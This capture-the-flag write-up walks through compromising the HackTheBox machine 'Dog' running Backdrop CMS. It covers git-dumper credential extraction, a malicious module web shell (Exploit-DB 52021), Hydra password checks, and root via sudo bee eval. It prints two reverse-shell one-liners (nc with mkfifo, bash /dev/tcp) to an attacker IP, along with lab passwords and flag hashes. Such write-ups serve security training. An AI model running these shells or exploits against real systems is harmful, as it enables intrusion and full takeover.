Overview
Dog is a Linux machine on HackTheBox rated Easy. The target runs Backdrop CMS on Apache with an exposed .git repository. Dumping the repo reveals database credentials and a valid username. After logging in as admin, a malicious PHP module provides a web shell and reverse shell. Privilege escalation abuses the Backdrop bee CLI tool, which can execute arbitrary PHP as root.
| Property | Value |
|---|---|
| OS | Linux (Ubuntu) |
| IP | 10.10.11.58 |
| Difficulty | Easy |
| Key Techniques | Git Dumper, Backdrop CMS RCE, Password Spraying, Sudo Abuse (bee) |
Enumeration
Port Scan
nmap -sC -sV 10.10.11.58
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 8.2p1 (Ubuntu) |
| 80/tcp | HTTP | Apache httpd 2.4.41 (Backdrop CMS 1.27.1) |
Nmap reveals key details about the web app:
- Backdrop CMS with title "Home | Dog"
- An exposed Git repository at
http://10.10.11.58:80/.git/ robots.txtwith 22 disallowed entries showing CMS structure
Add to /etc/hosts:
10.10.11.58 dog.htb
Directory Brute-Force
gobuster dir -u http://dog.htb -w /usr/share/wordlists/dirb/common.txt
Key findings:
| Path | Note |
|---|---|
/.git/HEAD |
Exposed Git repository |
/.htaccess |
403 Forbidden |
/.htpasswd |
403 Forbidden |
Foothold
Git Repository Dump
The exposed .git directory allows full repository extraction using git-dumper:
pipx install git-dumper
git-dumper http://dog.htb/.git website
Extracting Credentials
Inside the dumped repository, settings.php contains the database connection string:
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
Searching the git history for email addresses associated with @dog.htb reveals the user tiffany as the site admin.
User Enumeration with BackDropScan
To confirm valid usernames, BackDropScan can brute-force the Backdrop CMS login:
python BackDropScan.py --url http://dog.htb --userslist /usr/share/wordlists/rockyou.txt --userenum
Results: tiffany and morris are valid users.
Logging In
The database password works as the CMS admin password:
| Username | Password |
|---|---|
| tiffany | BackDropJ2024DS2024 |
Exploitation
Backdrop CMS RCE — Module Upload
Backdrop CMS 1.27.1 is vulnerable to Remote Code Execution via malicious module upload (Exploit-DB 52021).
The exploit generates a PHP web shell packaged as a module:
python exploit52021.py http://10.10.11.58
# Backdrop CMS 1.27.1 - Remote Command Execution Exploit
# Evil module generated! shell.zip
# Go to http://10.10.11.58/admin/modules/install for Manual Installation.
# Your shell address: http://10.10.11.58/modules/shell/shell.php
Since the site doesn't accept .zip uploads, repackage as .tar:
tar czf shell.tar shell
Upload via Administration → Functionality → Install modules and access the shell at /modules/shell/shell.php.
Reverse Shell
From the web shell, establish a proper reverse shell:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.242 4444 > /tmp/f
Lateral Movement to johncusack
Two users exist on the machine: jobert and johncusack. The web shell runs as www-data, so we need to pivot.
Using Hydra to confirm the password works for SSH (password reuse from the database):
hydra -l johncusack -P p.txt ssh://10.10.11.58
# [22][ssh] host: 10.10.11.58 login: johncusack password: BackDropJ2024DS2024
ssh johncusack@10.10.11.58
User flag:
johncusack@dog:~$ cat user.txt
cced24b324efb6c31b278fc51f45bfcc
Privilege Escalation
Sudo Enumeration
johncusack@dog:~$ sudo su
# Sorry, user johncusack is not allowed to execute '/usr/bin/su' as root on dog.
The user can't run su, but checking allowed sudo commands:
sudo /usr/local/bin/bee --help
Abusing bee CLI
bee is the Backdrop CMS command-line tool (similar to Drupal's drush). It supports several dangerous subcommands:
| Command | Description |
|---|---|
dbq |
Execute a query using db_query() |
eval |
Evaluate arbitrary PHP code after bootstrapping Backdrop |
php-script |
Execute an arbitrary PHP file |
scr |
Execute an arbitrary PHP file after bootstrapping |
The eval command allows executing arbitrary PHP as root since bee runs with sudo:
sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('bash -c \"bash -i >& /dev/tcp/10.10.14.242/4444 0>&1\"');"
This spawns a root reverse shell:
root@dog:~# cat root.txt
15959412f5610b4f57306de37c7dfb74
Key Takeaways
- Exposed
.gitdirectories are a critical misconfiguration. Tools likegit-dumpercan reconstruct the entire repository, often containing credentials in config files. - Password reuse between database and CMS/SSH accounts is extremely common and should always be tested.
- Backdrop CMS module upload requires admin access but provides trivial RCE. Keep CMS platforms patched and restrict admin access.
- CLI tools with sudo (like
bee,drush,wp-cli) that support code execution are equivalent to giving root shell access. Restrict sudo to specific safe subcommands if possible.